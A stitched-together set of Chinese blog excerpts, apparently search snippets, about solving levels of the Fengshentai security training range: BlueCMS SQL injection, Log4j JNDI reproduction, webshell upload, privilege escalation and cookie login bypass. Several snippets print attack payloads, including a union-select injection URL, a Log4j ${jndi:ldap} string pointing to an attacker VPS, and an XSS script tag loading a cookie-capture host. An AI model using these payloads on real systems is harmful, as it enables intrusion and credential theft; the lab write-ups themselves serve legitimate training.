掌控者-封神台靶场-萌新也能找到CMS漏洞

封神台之萌新也能找CMS漏洞整理记录工具信息收集通过后台直接获取SHELL使用终端shell 工具 御剑后台扫描工具 ，BurpSuite， 菜刀、蚁剑 信息收集 靶场地址 后台地址 先扫下敏感目录，这是后面才找来的工具，不然时间省下不少，后台是自己猜的，在模版文件路径那里白搞了半天（菜~）： 很明显，本站用的是CMS模版，版本：BlueCMS 1.6 ，页脚有显示： 然后网上查相关漏洞，存在SQL注入，这里就不说了，很多。查找过程中发现一个有意思的东西，后台登陆存在宽字节注入，无需账号密码即可登陆后

这里写自定义目录标题掌控者靶场DNS-Log注入过程0x01 前言0x02 利用思路0x03 靶场实战第一步：探测数据库名第二步：探测数据表名第三步：探测数据表对应的列名第四步：瞎逼懵0x04 写在最后 掌控者靶场DNS-Log注入过程 以下过程是在听取了线上课程后，结合自身经验，完成的靶场练习，若过程中有错误，还请大佬指正。 0x01 前言 DNS-Log，DNS是域名解析系统，说直白点就是机器名和IP地址转换。 DNS-Log，增加了一个log，也就是增加了一个日志记录，只不过记录的DNS的域名解析

靶场练习 封神台-掌控安全在线演练靶场 第一章：为了女神小芳！

里面有一个flag，刚开始我还比较不相信，抱着试试的心态去给flag，没想到真是这个。这里靶场作者肯定不是这么想的，你们还可以试试照提示说的去做。先看提示，说让我们sql注入，然后获取getshell。我们先开始进行信息收集，这是第一步，也是最重要的一步。使用kali Linux的dirsearch扫描目录。结果找到了一个名叫flag.txt的文件。扫出了好多目录，其中还有后台登录目录。试试找找有没有出错的文件。

第五章- 进击！拿到Web最高权限 Tips: 通过修改Cookie登录后台（没用重打） 2、上传SHELL！3、Flag在web根目录（flag.php） 3.上传图片时建议上传小文件，我建议用QQ表情。 来到传送门提示修改cookie，这里我们想到了第四关的flag-cookie信息如下，修改cookie信息，成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储里将上面的cookie值进行修改： 根据提示信息这

1

尤里的复仇，做过一遍重新复现一次，练习渗透测试

s:3:"age";s:4:"look";突然发现png文件头有问题，修改为89 50 4E 47 0D 0A 1A 0A。得到flag：zkaq-seriaLiZeeeeeee_G_Ood。echo 'flag{一道很简单的反序列化}';打开图片发现文件损坏，直接扔到16进制编辑器。} flag{一道很简单的反序列化}保存后再次打开图片，发现flag。

1.打开传送门 2.使用御剑或其它网站扫描工具对该页面进行扫描 扫描得到一个管理员登录界面以及疑似含有sql注入漏洞的界面 对该界面进行sql注入测试拼接语句orderby10 页面回显正常，输入order by 11，页面返回异常，验证含有10个字段 通过union拼接，查询是否含有admin表unionselect1,2,3,4,5,6,7,8,9,10fromadmin 页面提示传参错误，url中输入的sql注入语句被waf拦截，可以尝试将注入语句放入coo...

这时候就是要靠我们万能的 fofa 了，首先我们要知道有哪些 cms 有漏洞这里大家可以去找网上的漏洞库，里面一般都会有漏洞合集和这里我稍后会给大家推荐一两个看到没有，就是这么多cms，一杀一个准，上分必备漏洞当然很多漏洞都不能一步到位的，当然也有很多是可以给我们刷分的不过是否重复提交，这我就不太清楚了，可以给你们看看我的战果！当然，没审核，能重复几个我就不知道了，一切随缘—-这里随便找一个cms，给你们看看就这cms，信息泄露，你看，多香！，而且这个漏洞是直接把poc打上去就行了！

挖了一些phpcms的漏洞了，突然想尝试去挖一下javacms的漏洞，于是写下这篇文章来记录一下自己挖洞的一个流程，希望能帮助到一些正在学习挖洞的师傅们。

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档 Apache Log4j任意代码执行复现一、工具二、靶场三、步骤总结 一、工具 JNDIExploit-1.2-SNAPSHOT.jar 二、靶场 看网页源码 猜测就是username和password为注入点 三、步骤 vps有java环境 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP 成功运行 向密码框填入${jndi:ldap://vps的IP:1389/Basic/Comm.

利⽤mysql⽇志⽂件写shell，这个⽇志可以在mysql⾥改变它的存放位置，登录phpmyadmin可以修改这个存放位置，并且可以修改它的后缀名。PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。路径: E:\phpstudy_pro\Extensions\MySQL5.7.26\data\。猜测web路径: E:\phpstudy_pro\WWW。不要用\,如里要用\\(转义)

掌控安全封神台第三关  根据题目可能要用burp进行抓包，点击传送门进入题目主页 之前题目说的扫描到新的后台地址admin123 在网址后加入admin123 进入新的后台管理页面 根据第二关得到的用户和密码进行登录  进入后得到这样一个页面 抓包结果如下 根据代码分析只需要修改host和referer的ip地址 修改以后结果还是进不去 分析一下问题  打开F...

BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析 BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析 略读代码： 转换思路： 尝试宽字节注入： 理解宽字节： 总结： 参考： 略读代码： 开头包含了文件 require_once(dirname(__FILE__) . '/include/comm...

拿到题 睁大眼就能看见底下的 bluecms 1.6 百度了一下漏洞位置 学习了PW的姿势 SQL注入位置 http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1 Order by 7 字段长度为7 注入表名payload: ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(table_name)%20from%20information_sc..

题目 上一关已经上传图片马  在菜刀中查看发现c盘有flag.txt 文件但是没有权限访问 需要进行提权  发现可以上传文件 可以选择使用 cmd+pr 提权方式 上传cmd.exe 和pr.exe 上传成功 在菜刀的虚拟终端打开cmd.exe 用whoami指令查看当前权限 发现权限不足 需要提权 使用pr提权  使用pr添加新用户  将新用户添加至管理组 ...

【封神台 - 掌控安全靶场】尤里的复仇 小芳！第五章：进击！拿到Web最高权限！【配套课时：绕过防护上传木马实战演练】（等级：15） <script src = https：//xsspt.com/nxqPZY？1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP